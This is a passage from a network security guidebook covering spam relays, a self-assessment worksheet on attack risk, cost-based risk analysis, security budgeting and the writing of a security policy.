\nthousands or tens of thousands of e-mail addresses and mailing lists. When a spammer uses your mail system as a \nspam relay, your mail system becomes the host that tries to deliver all these messages. \n" }, { "page_number": 13, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 13\nThe result is a denial of service. While your mail server spends its time processing this spam mail, it is prevented \nfrom handling legitimate inbound and outbound mail for your domain. \nTip \nMost modern mail systems now include anti-spam settings. While these settings will not \nprevent you from receiving spam messages, they will prevent your system from being used \nas a spam relay, by accepting only messages going to or coming from your domain. \nFearing retribution, most spammers would rather use your mail system than their own. The typical spammer will \nattempt to hide the actual return address, so that anyone trying to trace the message assumes that it was delivered \nfrom your domain. \nSpammers go to all this trouble because many Internet users do not appreciate receiving spam mail. “Do not \nappreciate” is an understatement: spam mail can downright infuriate many people, who will take it upon \nthemselves to retaliate by launching a counterattack with mail bombs and denial-of-service attacks. \nSuch counterattacks can quickly produce devastating results for your business. For example, I once consulted for a \nsmall manufacturer of networking products. Shortly after its Internet connection was brought online, one of the \naggressive salespeople got the bright idea of sending out a mass mailing to every mailing list and newsgroup that \nhad even a remote association with computer networking. \nAs you might guess, the mailing generated quite a few responses—but not of the type that the salesperson had \nhoped for. Within hours of the mailing, literally tens of thousands of messages were attempting delivery into the \ndomain. These messages contained quite colorful descriptions of what each sender thought of the advertisement, \nthe company, and its product line. The volume of mail soon caused both the mail server and the mail relay to run \nout of disk space. It became impossible to sort through the thousands of messages to determine which were \nlegitimate and which were part of the attack. As a result, all inbound mail had to be purged and the mail relay shut \ndown for about a week until the attacks subsided. \nWhile this particular attack was due to the shortsightedness of a single employee, external spam routed through \nyour system can create the same headaches and costs. \n \nChapter Worksheet \nIn the sidebar below, you can assess your own network’s current susceptibility to attack. \nAssessing Your Attack Potential \nThe following questions will help you evaluate potential threats to your network. Rate \neach question on a scale of 1 to 5. A 1 signifies that the question does not apply to \nyour organization’s networking environment; a 5 means the question is directly \napplicable. \n1. Is your network physically accessible to the public, such as a library or \ngovernment office? \n2. Is your network accessible by users not employed by your organization, such as a \nschool or university? \n3. Do you offer a public networking service, such as an Internet service provider? \n4. Are there users outside the networking staff who have been granted root or \nadministrator privileges? \n5. Are users allowed to share common logon names such as Guest? \n6. Can your organization’s line of business be considered controversial? \n7. Does a portion of your organization’s business deal with financial or monetary \ninformation? \n8. Is any portion of your network electronically accessible by the public (Web server, \nmail server, and so on)? \n9. Does your organization produce a product or provide a highly skilled service? \n10. Is your organization experiencing aggressive growth? \n11. Do news stories about your organization regularly appear in newspapers or trade \nmagazines? \n" }, { "page_number": 14, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 14\n12. Does your organization do business over public networking channels, such as the \nInternet or frame relay? \nFor questions 1–6, if your organization scored between 8 and 12, you should take \nsteps to secure your internal network. If your organization scored above 12, you \nshould lock down your internal environment just as aggressively as you would secure \nyour network’s parameter. \nFor questions 6–11, if your score was between 7 and 10, it may be most cost \neffective to utilize only a minimal amount of security around the parameter of your \nnetwork. If your score was between 11 and 16, you should be utilizing some solid \nfirewall technology. If you scored above 16, consider using multiple firewall solutions. \nIf question 12 applies to your organization, you should investigate extending your \ndefenses beyond the physical limits of your network. Once data leaves the confines of \nyour network, it is that much more difficult to insure that it is not compromised. \nIn later chapters, we’ll examine in detail the technology required by each of the above \nsituations. This checklist is designed to give you an early feel for how security \nconscious you should be when securing your networking environment. Keep in mind \nthat this list is simply a guide; each network has its own individual nuances. Your \nmileage may vary. \n \nNote \nAlong with the results of this worksheet, you should also take a close look at the \nlevel of computer expertise within your organization. A “power user” environment is \nless likely to cause damage inadvertently—but is more likely to have the knowledge \nrequired to launch an attack. Conversely, an uneducated user environment is less \nlikely to launch an attack but more likely to cause accidental damage. \n \nSummary \nIn this chapter, we saw that the number of security incidents is increasing and that most of these go undocumented. \nWe looked at the differences between a hacker and an attacker and covered the benefits of discussing security \nvulnerability in a public forum. We also explored who might try to attack your network and why, as well as how to \nassess your likelihood of being the target of an attack. \nNow that you understand who may wish to attack you and why, you can evaluate the different levels of risk to \nyour organization. By performing a risk analysis, you will see more clearly how much protection your \norganization truly needs. \n \nChapter 2: How Much Security Do You Need? \nBefore you decide how to best safeguard your network, you should identify the level of protection you wish to \nachieve. Begin by analyzing your network to determine what level of fortification you actually require. You can \nthen use this information to develop your security policy. Once you are armed with this information, you are in a \ngood position to start making intelligent decisions about your security structure. \nPerforming a Risk Analysis \nA risk analysis is the process of identifying the assets you wish to protect and the potential threats against them. \nPerforming an accurate risk analysis is a vital step in securing your network environment. \nA formal risk analysis answers the following questions: \nƒ What assets do I need to protect? \nƒ From what sources am I trying to protect these assets? \nƒ Who may wish to compromise my network and to what gain? \n" }, { "page_number": 15, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 15\nƒ How likely is it that a threat will violate my assets? \nƒ What is the immediate cost if an asset is compromised? \nƒ What is the cost of recovering from an attack or failure? \nƒ How can these assets be protected in a cost-effective manner? \nƒ Am I governed by a regulatory body that dictates the required level of security for my \nenvironment? \nWhat Assets Do I Need to Protect? \nAny effective risk analysis must begin by identifying the assets and resources you wish to protect. Assets typically \nfall into one of four categories: \nƒ \nPhysical resources \nƒ \nIntellectual resources \nƒ \nTime resources \nƒ \nPerception resources \nPhysical Resources \nPhysical resources are assets that have a physical form. These include workstations, servers, terminals, network \nhubs, and even peripherals. Basically, any computing resource that has a physical form can be considered a \nphysical resource. \nWhen performing a risk analysis, don’t forget physical resources. I once worked at an organization whose security \npolicies were loose—to say the least. One day, an individual walked in the front door and identified himself as the \nprinter repairman. The receptionist, a trusting soul, waved him through, giving him directions on how to find the \noffice of the company’s network administrator. A few minutes later, the “repairman” returned to the front desk, \nclaiming that the printer needed repair and that he was taking it back to the shop. \nThe printer, of course, did not need repair. The “repairman” never sought out the network administrator; he \ndisconnected the first high-end printer he came across and walked right out the door with it. The network \nadministrator discovered the theft later when employees complained that they could not print (difficult to do when \nyou do not actually have a printer!). \nThe final objective of a risk analysis is to formulate a cost-effective plan for guarding your assets. In the course of \nyour analysis, do not overlook the most obvious problem areas and solutions. For example, the printer theft just \ndescribed could have been completely avoided if the organization had required all non-employees to have an \nescort. Implementing this precaution would have had a zero cost impact—and would have saved the company the \ncost of replacing a top-end network printer. \nIntellectual Resources \nIntellectual resources can be harder to identify than physical resources, because they typically exist in electronic \nformat only. An intellectual resource would be any form of information that plays a part in your organization’s \nbusiness. This can include software, financial information, and database records, as well as schematic or part \ndrawings. \nTake your time when listing intellectual resources. It can be easy to overlook the most obvious targets. For \nexample, if your company exchanges information via e-mail, the storage files for these e-mail messages should be \nconsidered intellectual assets. \nTime Resources \nTime is an important organizational resource, yet one sometimes overlooked in a risk analysis. Time, however, \ncan be one of an organization’s most valued assets. When evaluating what lost time could cost your organization, \nmake sure that you include all the consequences of lost time. \nTime Is Money \n" }, { "page_number": 16, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 16\nHow much is lost time worth? As an example, let’s say that you identify one of your Engineering servers as an \norganizational resource. You identify the physical resource (the server itself) and the intellectual resources (the \ndata stored on the server’s hard drive). How do you factor time resources into your risk analysis? \nLet’s assume that although the server is backed up nightly, the server has no built-in fault tolerance. There is just a \nsingle disk holding all of the Engineering data. What if the server experiences a hard drive crash? What is lost in \nphysical, intellectual, and time resources due to this crash? \nThe physical loss would be the drive itself. Given the cost of hard drive space these days, the dollar value of the \ndrive would be minimal. \nAs for intellectual loss, any data saved to the server since the last backup would be gone. Since you have nightly \nbackups, the loss should be no greater than one day’s worth of information. This, of course, brings us back to time, \nbecause it will take time for the engineers to rebuild the lost information. \nIn determining the actual time loss, consider the cleanup job for the server administrator, who must \nƒ Locate and procure a suitable replacement drive for the server. \nƒ Install the new drive in the system. \nƒ Completely reinstall the network operating system, any required patches, and the back-\nup software, if necessary. \nƒ Restore all required backup tapes. If a full backup is not performed every night, there \nmay be multiple tapes to restore. \nƒ Address disk space issues, if multiple tapes are required for restoration. (Backup \nsoftware typically does not record file deletions. Therefore, you may end up restoring \nfiles that were previously deleted to create additional disk space.) \nAlso, since the server administrator is focusing on recovering the server, her other duties must wait. \nKeep in mind that while the server administrator is doing all this work, the Engineering staff may be sitting idle or \nplaying Quake, waiting for the server to come back online. It is not just the server administrator who is losing \ntime, but the entire Engineering staff, as well. \nTo quantify this loss, let’s add some dollars to the equation. Let’s assume that your server administrator is \nproficient enough to recover from this loss in one work day. Let’s also assume that she earns a modest salary of \n$50,000 per year, while the average salary for the 30 programmers who use this system is $60,000 per year. \nƒ Administrator’s time recovering the server = $192 \nƒ Engineering time to recover one day’s worth of data = $6,923 \nƒ Engineering time lost due to offline server = $6,923 \nƒ Total cost impact of one-day outage = $14,038 \nClearly, the cost of a one-day server outage can easily justify the cost of redundant disks, a RAID array, or even a \nstandby server. Our calculations do not even include the possibility of lost revenue or reputation if your \nEngineering staff now fails to meet a scheduled shipment date. \n \nAs you attempt to quantify time as a resource within your organization, make sure you identify its full impact. \nVery rarely does the loss or compromise of a resource affect the productivity of only a single individual. \nPerception Resources \nAfter the denial-of-service attacks in February of 2000, most of the companies (including Yahoo, Amazon, eBay, \nand Buy.com, among others) involved saw their stock price fall. Although this loss was not long term, it was still \nhad a real, measurable impact on the trust of consumers and stockholders. With the publicity surrounding the \npenetration of Microsoft’s systems in October of 2000, some wondered if valuable source code had been \n" }, { "page_number": 17, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 17\nunknowingly altered. Although Microsoft denied damage, the sheer fact of penetration has been enough to damage \nthe credibility and trust of not only the company but also its products. \nNote \nFor a publicly-traded company, reputation can translate into a tangible asset. Even for \nprivately held companies or governmental departments, every organization survives on its \nreputation. In many cases, organizations might be tempted to put more emphasis \nmaintaining a perception of trust and capability than on maintaining true data integrity. \nThe risk of damage to perception has been the cause of significant trouble for those working in the security \nindustry (including law enforcement entities) who rely on the information and experience of their peers to design \nbetter protection systems or to pursue legal actions. In an attempt to encourage the free exchange of valuable \ntechnical details of hacking attacks, while preserving the perception of the contributing company, the Federal \nBureau of Investigations (FBI) has established the Infrastructure Protection and Computer Intrusion Squad \n(IPCIS), which functions as an anonymous clearinghouse of hacker techniques and procedures. \nNote \nA denial-of-service (DoS) attack attempts to prevent a system from carrying on network \ncommunications. A DoS attack may try to make a single service on a target system \ninoperable, or the goal of the attack may be to deny all network connectivity. \nFrom What Sources Am I Trying to Protect These Assets? \nPotential network attacks can come from any source that has access into your network. These sources can vary \ngreatly, depending on your organization’s size and the type of network access provided. While performing a risk \nanalysis, insure that you identify all potential sources of attack. Some of these sources could include \nƒ \nInternal systems \nƒ \nAccess from field office locations \nƒ \nAccess through a WAN link to a business partner \nƒ \nAccess through the Internet \nƒ \nAccess through modem pools \nKeep in mind that you are not yet evaluating who may attack your network. You are strictly looking at what media \nare available to gain access to network resources. \nWho May Wish to Compromise Our Network? \nIn the last chapter, we discussed who in theory might be motivated to compromise your network. You should now \nput pen to paper and identify these potential threats. To review, potential threats could be \nƒ \nEmployees \nƒ \nTemporary or consulting personnel \nƒ \nCompetitors \nƒ \nIndividuals with viewpoints or objectives radically different from those of your organization \nƒ \nIndividuals with a vendetta against your organization or one of its employees \nƒ \nIndividuals who wish to gain notoriety due to your organization’s public visibility \nDepending on your organization, there may be other potential threats you wish to add to this list. The important \nthings to determine are what each threat stands to gain by staging a successful attack, and what this attack may be \nworth to a potential attacker. \nWhat Is the Likelihood of an Attack? \nNow that you have identified your resources and who might attack them, you can assess your organization’s level \nof potential risk to attacks. Do you have an isolated network, or does your network have many points of entry such \nas a WAN, modem pool, or an inbound VPN via the Internet? Do all of these connection points use strong \nauthentication and some form of firewalling device, or were rattles and incense used to set up a protective aura \naround your network? Could an attacker find value in exploiting one of these access points in order to gain access \nto your network resources? Clearly, a typical would-be attacker would prefer to attack a bank rather than a small \narchitectural firm. \n" }, { "page_number": 18, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 18\nAppraising the attack value of your network is highly subjective. Two different people within the same \norganization could have completely different opinions about the likelihood of an attack. For this reason, consider \nsoliciting input from a few different departments within your organization. You may even want to bring in a \ntrained consultant who has hands-on experience in determining risk assessment. It is important that you define and \nunderstand the likelihood of attack as clearly as possible—it will guide you when you cost justify the security \nprecautions required to safeguard your network. \nWhat Is the Immediate Cost? \nFor each asset listed, record the immediate cost impact of having that resource compromised or destroyed. Do not \ninclude long-term effects (such as failure to meet shipment deadlines); simply calculate the cost of having this \nasset inaccessible as a network resource. \nFor example, given the hard-drive failure we looked at earlier, the immediate cost impact of the failure would be \ndefined as the lost productivity of the Engineering staff for each minute that the server remains offline—roughly \n$14.50 per minute. \nSometimes immediate cost can be more difficult to quantify. For example, what if the compromise leads to a \ncompetitor gaining access to all schematics, drawings, and parts lists for a new product line? This could allow \nyour competitor to develop a better product and beat your release to market. The loss in such a case could be \ndisastrous. Even more difficult to quantify, but no less real, is the loss of trust, or the perception of weakness. \nUsually reflected by lower stock prices, compromised investor and consumer confidence (not to mention lowered \nemployee morale) are all immediate reactions that can affect the bottom line. \nSometimes, however, monetary cost is not the main factor in determining losses. For example, while a hospital \nmay suffer little financial loss if an attacker accesses its medical records, the destruction of these records could \ncause a catastrophic loss of life. When determining the immediate cost of a loss, look beyond the raw dollar value. \nWhat Are the Long-Term Recovery Costs? \nNow that you have quantified the cost of the initial failure, you should evaluate the costs incurred when recovering \nfrom a failure or compromise. Do this by identifying the financial impact of various levels of loss. \nFor example, given a server that holds corporate information, \nƒ \nWhat is the cost of a momentary glitch that disconnects all users? \nƒ \nWhat is the cost of a denial-of-service attack, which makes the resource unreachable for a \nspecific period of time? \nƒ \nWhat is the cost of recovering critical files that have been damaged or deleted? \nƒ \nWhat is the cost of recovering from the failure of a single hardware component? \nƒ \nWhat is the cost of recovering from a complete server failure? \nƒ \nWhat is the cost of recovery when information has been stolen and the theft goes \nundetected? \nThe cost of various levels of failure, combined with the expectation of how frequently a failure or attempted attack \nmay occur, provides metrics to determine the financial impact of disaster recovery for your organization’s \nnetwork. Based on these figures, you now have a guide to determine what should be reasonably spent in order to \nsecure your assets. Remember that some assets (like reputation or consumer and investor confidence) can be \ndifficult to quantify, but are real nonetheless. \nHow Can I Protect My Assets Cost-Effectively? \nYou must consider how much security will cost when determining what level of protection is appropriate for your \nnetworking environment. For example, it would probably be overkill for a five-user architectural firm with no \nremote access to hire a full-time security expert. Likewise, it would be unthinkable for a bank to allow outside \nnetwork access without regard to any form of security measures or policies. \nMost of us, however, fall somewhere in between these two networking examples—so we face some difficult \nsecurity choices. Is packet filtering sufficient for protecting my Internet connection, or should I invest in a \n" }, { "page_number": 19, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 19\nfirewall? Is one firewall sufficient, or is it worthwhile to invest in two? These are some of the decisions that plague \nsecurity experts on a daily basis. \nTip \nThe general guideline is that the cost of all security measures taken to protect a particular \nasset should be less than the cost of recovering that asset from a disaster. This is why it is \nimportant to quantify potential threats as well as the cost of recovery. While security \nprecautions are necessary in the modern networking environment, many of us are still \nrequired to justify the cost of these precautions. \nCost justification may not be as difficult as it sounds. For example, we noted that a one-day server outage in our \nEngineering environment could cost a company well over $14,000. Clearly, this is sufficient cost justification to \ninvest in a high-end server complete with RAID array. \nThere can be hidden costs involved in securing an environment, and these costs must also be taken into account. \nFor example, logging all network activity to guard against compromise is useless unless someone dedicates the \ntime required to review all the logs generated. Clearly, this could be a full-time job all by itself, depending on the \nsize of the environment. By increasing the level of detail being recorded about your network, you may create a \nneed for a new security person. \nAlso, with increased security there is typically a reduction in ease of use or access to network resources, which can \nmake it more cumbersome and time-consuming for end users to perform their job functions. This does not mean \nthat you must avoid this reduction in ease of use; it can be a necessary evil when securing an environment and \nmust be identified as a potential cost in lost productivity. \nTo summarize, before you solicit funds for security precautions, you should outline the ramifications of not \nputting those precautions into place. You should also accurately identify what the true cost of these precautions \nmay be. \nAm I Governed by a Regulatory Body? \nEven though you have created a painstakingly accurate risk analysis of your network, there may be some form of \nregulatory or overview body that dictates your minimum level of security requirements. In these situations, it may \nnot be sufficient to simply cost justify your security precautions. You may be required to meet certain minimum \nsecurity requirements, regardless of the cost outlay to your organization. \nFor example, in order to be considered for military contract work, your organization must strictly adhere to many \nspecific security requirements. Typically, the defined security precautions are not the only acceptable security \nmeasures, but they are the accepted minimum. You are always welcome to improve on these precautions if your \norganization sees fit. \nNote \nWhen working with the government, many contractors are required to use a computer \nsystem that has received a specific Trusted Product rating by the National Security \nAgency. For a list of which products have received each rating, check out \nhttp://www.radium.ncsc.mil/tpep/epl/epl-by-class.html. \nOther examples of government regulation that dictate security requirements include the Children’s Online Privacy \nand Protection Act (COPPA—see www.ftc.gov/bcp/conline/pubs/buspubs/coppa.htm) and the Health \nInsurance Portability and Accountability Act (HIPAA—see \nwww.nationalpartnership.org/healthcare/hipaa/guide.htm). Although the U.S. has yet to pass any privacy \nlaws concerning e-commerce, other countries (most notably in Europe) strictly control what data can be collected \nand stored by companies. \nIf your organization’s security is subject to some form of regulatory agency, you will be required to modify the \ncost-justification portion of your risk analysis in order to bring your recommendations in line with dictated policy. \n \nBudgeting Your Security Precautions \nYou should now have a pretty good idea about what level of security you will be able to cost justify. This should \ninclude depreciable items (server hardware, firewalls, and construction of secured areas), as well as recurring costs \n(security personnel, audits, and system maintenance). \nRemember the old saying, “Do not place all of your eggs in one basket”? This wisdom definitely applies to \nbudgeting security. Do not spend all of your budget on one mode of protection. For example, it does little good to \ninvest $15,000 in firewall technology if someone can simply walk through the front door and walk away with your \ncorporate server. \n" }, { "page_number": 20, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 20\nTip \nIt may be possible, however, to combine budget expenditures with other groups within your \norganization. For example, while it may be difficult to cost justify a secure, controlled \nenvironment for your networking hardware and servers, you might justify this cost if the \nroom will also house all PBX, voicemail, and telephone equipment. \nAnother example could be the Engineering server we discussed earlier in this chapter. Engineers always require \nadditional server storage space (it’s in the job description). During the next upgrade of server storage, it may be \npossible to justify a redundant disk system and charge part of the cost to the Engineering department. \nA new addition to the security budget at some companies is security insurance. Although this might seem unusual \nat first glance, most IT professionals can readily see the dollar value of their data and how the corruption or loss of \nthat data justifies taking such a precaution. \nThe bottom line is to be creative. The further you can stretch your security budget, the more precautions you can \ntake. Security is a proactive expenditure, meaning that we invest money in security precautions and procedures \nwith the hope that we will realize a return on our investment by not having to spend additional money later playing \ncleanup to a network disaster. The more precautions that can be taken, the less likely disaster is to strike. \n \nDocumenting Your Findings \nYou’ve now identified all your assets, analyzed their worth to your day-to-day operations, and estimated the cost \nof recovery for each. Now take some time to formalize and document your findings. There are a number of \nreasons why this is worth your time. \nFirst, having some sort of document—whether electronic or hard copy—gives you some backup when you begin \nthe tedious process of justifying each of your countermeasures. It is far more difficult to argue with documented \nnumbers and figures than it is to argue with an oral statement. By getting all your ducks in a row up front, you will \nbe less likely to have to perform damage control later. \nThis document should be considered fluid; expect to have to adjust it over time. No one is ever 100 percent \naccurate when estimating the cost of intrusion or failures. If you are unfortunate enough to have your inaccuracy \ndemonstrated, consider it an opportunity to update and improve your documentation. \nNetwork environments change over time, as well. What happens when your boss walks into your office and \nannounces, “We need to set up a new field office. What equipment do we need and how much will it cost us?” By \nhaving formal documentation that identifies your current costs, you can easily extrapolate these numbers to \ninclude the new equipment. \nThis information is also extremely useful as you begin the process of formalizing a security policy. Many people \nhave an extremely deficient understanding of the impact of network security. Unfortunately, this can include \ncertain managerial types who hold the purse strings on your budget (just look for the pointy hair—it’s a dead \ngiveaway). \nAs you begin to generate your security policy, it is much easier to justify each policy item when you can place a \ndollar value on the cost of an intrusion or attack. For example, your manager may not see the need for encrypting \nall inbound data until she realizes that the loss of this information could rival the cost of her salary. The last thing \nshe wants to hear is that someone above her may realize that the company can recoup this loss by simply removing \nthe one person who made a very bad business decision. \n \nDeveloping a Security Policy \nThe first question most administrators ask is, “Why do I even need a formal security policy?” A security policy \nserves many functions. It is a central document that describes in detail acceptable network activity and penalties \nfor misuse. \nA security policy also provides a forum for identifying and clarifying security goals and objectives to the \norganization as a whole. A good security policy shows each employee how she is responsible for helping to \nmaintain a secure environment. \nNote \nFor an example of a security policy, see Appendix B. \n" }, { "page_number": 21, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 21\nSecurity Policy Basics \nSecurity policies tend to be issue driven. A focus on individual issues is the easiest way to identify—and clarify—\neach point you wish to cover. While it may be acceptable in some environments to simply state, “Non–work-\nrelated use of the Internet is bad,” those who must adhere to this policy need to know what “non–work-related \nuse” and “bad” actually mean. \nIn order for a policy to be enforceable, it needs to be \nƒ \nConsistent with other corporate policies \nƒ \nAccepted by the network support staff as well as the appropriate levels of management \nƒ \nEnforceable using existing network equipment and procedures \nƒ \nCompliant with local, state, and federal laws \nConsistency Is Key \nConsistency insures that users will not consider the policies unreasonable or irrational. The overall theme of your \nsecurity policy should reflect your organization’s views on security and acceptable corporate practices in general. \nIf your organization has a very relaxed stance towards physical security or use of company assets, it may be \ndifficult or pointless to enforce a strict network usage policy. For example, I once consulted for a firm whose \nowner insisted that all remote connections to the network be encrypted using the largest cipher key possible. \nRemote users were required to maintain different logon names and passwords for remote access, and these \naccounts had be provided with only a minimal amount of access. Also, remote access was left disabled unless \nsomeone could justify a specific need for accessing the network remotely. \nWhile this may not seem all that far-fetched, the facility where this network was housed was protected by only a \nsingle cipher lock with a three-digit code. The facility had no alarm system and was in a prime physical location to \nbe looted undetected. The combination for the cipher lock had not been changed in over seven years. Also, \nemployees frequently gave out the combination to anyone they felt needed it (this included friends and even the \nlocal UPS guy!). \nAs if all this were not bad enough, there was no password requirement for any of the internal accounts. Many \nusers (including the owner) had no passwords assigned to their accounts. This included two servers that were left \nin an easily accessible location. \nThe firm was probably right to be concerned with remote-access security. The measures taken bordered on absurd, \nhowever, when compared to the organization’s other security policies. Clearly, there were other issues that should \nhave had a higher priority than remote network access. The owner may very well have found this remote-access \npolicy difficult to enforce, because it was inconsistent with the organization’s other security practices. If the \nemployees see little regard being shown for physical access to the facility, why should Internet access be any \ndifferent? \nAcceptance within the Organization \nFor a policy to be enforceable, it must be accepted by the appropriate authorities within the organization. It can be \nfrustrating at best to attempt to enforce a security policy if management does not identify and acknowledge the \nbenefits your policy provides. \nA good example of what can happen without management acceptance is the legal case of Randal Schwartz (a \nmajor contributor to the Perl programming language) versus Intel. While he was working as a private contractor \nfor Intel, Schwartz was accused of accessing information which, according to Intel’s security policy, he should not \nhave been viewing. Although Intel won its controversial case against Schwartz, that case was severely weakened \nwhen it came to light that Intel’s full-time employees were not bound to the same security policy they were \nattempting to use to convict Schwartz. \nWhile testifying in the trial, Ed Masi, Intel’s corporate vice president and general manager, freely admitted to not \nfollowing Intel’s security policy. What made the case even more murky was that Intel never filed charges against \nMasi for failing to adhere to the policy. This left the impression that Intel’s security policy was fluid at best and \nthat Schwartz was being singled out. \nNote \nYou can read all about Randal Schwartz versus Intel at \nwww.lightlink.com/spacenka/fors/. \n" }, { "page_number": 22, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 22\nAn organization’s security policy must be accepted and followed at all levels of management. In order to be \nsuccessful, it must be understood that these policies are equally applicable to all network users. \nEnforceability \nIn order for a security policy to have merit, it must be enforceable. Stating that “each network user is required to \nchange his or her password every 90 days” will have little effect if your network operating system does not expire \nand lock accounts that exceed this 90-day limit. \nWhile you can legally create policies that cannot be enforced, doing so as a matter of practice is not a wise choice. \nYou do not want to leave your users with the impression that ignoring corporate policy is OK because adherence is \nnot verified. If there is no verification, then there are no ramifications for noncompliance. If there were no state \ntroopers, how many of us would drive at the speed limit on the highway? \nTip \nNoncompliance with one network usage policy can quickly lead to a domino effect of \nemployees ignoring all network usage policies. Choose your battles wisely. This is \nparticularly true if you are establishing a network usage policy for the first time. You do not \nhave to verify usage compliance 100 percent of the time—but make sure that you have \nsome method of reporting or monitoring usage if enforcement of your policy becomes an \nissue. \nSometimes it is not even sufficient to actively monitor all aspects of a specific policy issue. Take care to \ndisseminate such issues in an appropriate manner. For example, a security policy is typically considered to be \ncompany private. However, there may be policy issues that affect individuals outside of the organization. These \npolicy issues must be made public in order to insure that they are enforceable. \nThere is a story floating around the Internet (it may be truth or it may be lore) that describes how an organization \nmonitored, tracked, and then identified a remote attacker who had broken into one of its systems. As the story \ngoes, the police arrested the suspect, and the accused was brought to trial. \nDuring the trial, the accused freely admitted to accessing the network resource in question. His stated defense was \nthat he had no idea that he was doing anything wrong, since upon accessing the resource he was presented with a \n“welcome” screen. \nThe defense argued that it was beyond the accused’s ability to determine that he should not have been accessing \nthis specific resource. As a precedent, defense lawyers cited a local property law requiring landowners to post \nnotices to keep trespassers off their land. The judge, who found it easier to relate to local property laws than to \nhigh-tech computer crimes, accepted the defense’s argument and released the suspect. \nAs part of enforcing your network security policy, make sure you disseminate it properly. Do not overlook some \nof the more obvious places to state this policy, such as logon scripts and terminal messages. \nCompliance with Local, State, and Federal Laws \nYou might want to have your organization’s legal counsel review any policies before you implement them. If any \nportion of a specific policy issue is found to be unlawful, the entire issue—or even the policy itself—may be \ndisregarded. \nFor example, a policy stating that “noncompliance will result in a severe flogging” will be thrown out by a court of \nlaw if flogging has been outlawed in your locale. You may truly wish to flog the attacker for compromising your \nnetwork, but by specifying an illegal reprisal, you may surrender all chances of recourse. Appropriate wording is \ncrucial. Insure that all policies are written in a precise, accurate, and legal manner. \nA legal review will also help to identify the impact of each policy item. Without precise wording, a well-\nintentioned policy may have an extremely negative effect. \nIn a recent court case, an employee won a $175,000 settlement because she accidentally viewed what she \nconsidered to be a pornographic Web site while on the job. How did she get away with holding her employer \naccountable? Was the questionable site located on a company-owned Web server? \nThe answer should scare you. The company had a corporate policy stating that “pornographic sites will be \nblocked, and they cannot be accessed from the corporate network.” The company was filtering out access to sites \nthat contained what it considered to be questionable subject matter. Unfortunately, there are so many \n“questionable” sites on the Internet that there is no way to block them all. \n" }, { "page_number": 23, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 23\nThe court ruled that the company was liable for breach of contract because it did not hold up its end of the bargain \nby blocking all so-called questionable sites. By instituting a policy stating that it would filter out these sites, the \ncompany was “accepting responsibility for the successful execution of this activity”—and was therefore \naccountable. The damage award, as well as reimbursement for the employee’s “distress,” was based on this \nfinding. \nHow should this policy item have been written? Consider the following statement: \nAccessing Internet-based Web sites with company-owned assets, for purposes other than executing \nresponsibilities within an employee’s job function, is considered grounds for dismissal. We reserve \nthe right to monitor and filter all employee network activity in order to insure compliance. \nThis statement still enforces the same policy spirit by banning undesirable sites. It removes the word \n“questionable,” which is wide open to interpretation, and specifically forbids all Web site access that is not related \nto an employee’s job function. Also, it puts the burden of compliance on the employee, not the employer, while \nstill allowing the organization to attempt to filter out these sites. \nTip \nProper wording can make all the difference in the world between a good and a bad security \npolicy. \nWhat Makes a Good Security Usage Policy? \nAt a minimum, a good security usage policy should \nƒ \nBe readily accessible to all members of the organization. \nƒ \nDefine a clear set of security goals. \nƒ \nAccurately define each issue discussed in the policy. \nƒ \nClearly show the organization’s position on each issue. \nƒ \nDescribe the justification of the policy regarding each issue. \nƒ \nDefine under what circumstances the issue is applicable. \nƒ \nState the roles and responsibilities of organizational members with regard to the described \nissue. \nƒ \nSpell out the consequences of noncompliance with the described policy. \nƒ \nProvide contact information for further details or clarification regarding the described issue. \nƒ \nDefine the user’s expected level of privacy. \nƒ \nInclude the organization’s stance on issues not specifically defined. \nAccessibility \nMaking your security policy public within the organization is paramount to its effectiveness. As mentioned earlier, \nlogon scripts and terminal messages are a good start. \nIf your organization has an employee handbook, see about incorporating your security policy into this document. \nIf your organization maintains an intranet Web site for organizational information, have your document added to \nthis site, as well. \nDefining Security Goals \nWhile it may seem like simple common sense, a statement of purpose, which defines why security is important to \nyour organization, can be extremely beneficial. This statement can go a long way toward insuring that policy \nissues are not deemed frivolous or unnecessary. \nAs part of this statement, feel free to specify your organization’s goals for its security precautions. People are far \nmore accepting of additional standards and guidelines when they understand the benefits these can provide. \n" }, { "page_number": 24, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 24\nTip \nA sample security policy has been included in Appendix B. Use this as a guide when \ncreating a security policy for your organization. \nDefining Each Issue \nBe as clear and precise as possible when describing each policy issue. Insure that all language and terminology are \nas accurate as possible. \nFor example, do not refer to Internet access in general; instead, identify the specific services the issue addresses \n(e-mail, file transfers, and so on). If it becomes necessary later to enforce the policy issue, your organization will \nhave a precise description to fall back on. All too often, general descriptions are open to interpretation—and \nmisinterpretation. \nTip \nAn accurate description becomes even more important if your company uses VPN \ntechnology over the Internet. Be precise in defining the difference between public hosts on \nthe Internet and hosts located on the other end of a VPN connection. \nYour Organization’s Position \nUse clear, concise language to state your organization’s views on the described policy issue. For example, \nadjectives such as “unacceptable” contain many shades of gray. A worker’s performance might be \n“unacceptable”—but not necessarily in violation of any specific policy. \nWhen describing matters of policy, stick to words that convey clear and precise meanings. Negative examples of \nsuch include “violation,” “breach of contract,” “offense,” and “abuse.” Positive examples include “permissible,” \n“legitimate,” “sanctioned,” and “authorized.” By avoiding ambiguous terms, you can be certain that the policy \nmeanings—as well as the ramifications of noncompliance—are clear and enforceable. \nJustifying the Policy \nWe have already discussed a general statement of purpose, which defines an overall set of security goals; you \nshould also justify each policy issue. This shows your network users why each point in the policy is important. \nFor example, the statement, “Since e-mail is considered to be an unsecured medium, it is not permissible to use it \nfor conveying company private information,” simultaneously states the policy issue and justifies the policy. \nWhen Does the Issue Apply? \nBe sure to make clear under what circumstances the policy is considered to be in effect. Does the policy affect all \nusers equally, or only certain work groups? Does it remain in effect after business hours? Does it affect the main \noffice only, or field offices as well? \nWhen you set forth clearly how the policy will be applied, you also clarify its expected impact. This insures that \nthere is no uncertainty about whom this policy applies to. You want to eliminate the possibility that any employee \nwill assume that the policy must apply to everyone but himself or herself. 